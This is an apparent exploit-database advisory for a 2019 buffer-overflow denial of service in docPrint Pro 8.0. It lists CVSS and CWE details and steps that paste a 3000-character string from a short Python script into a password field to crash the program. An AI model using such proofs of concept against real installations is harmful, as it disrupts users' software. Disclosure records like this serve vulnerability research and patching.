Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)

vendor:

DocPrint Pro

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: DocPrint Pro

Affected Version From: 8.0

Affected Version To: 8.0

Patch Exists: No

Related CWE: N/A

CPE: a:verypdf:docprint_pro:8.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Document Converter (docPrint Pro) v8.0 – Denial of Service (PoC)

DocPrint Pro is vulnerable to a denial of service attack when a maliciously crafted file is opened. When a user opens a maliciously crafted file, the application crashes due to a buffer overflow.

Mitigation:

Users should avoid opening files from untrusted sources and should update to the latest version of the software.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt"
# 2.- Copy the text from the generated DocConverterr.txt file to clipboard
# 3.- Open docPrint Document Converter
# 4.- Go to 'Setting' > 'PDF Security'
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'
# 7.- Click on 'Start', you will see a crash

buffer = "\x41" * 3000
f = open ("DocConverter.txt", "w")
f.write(buffer)
f.close()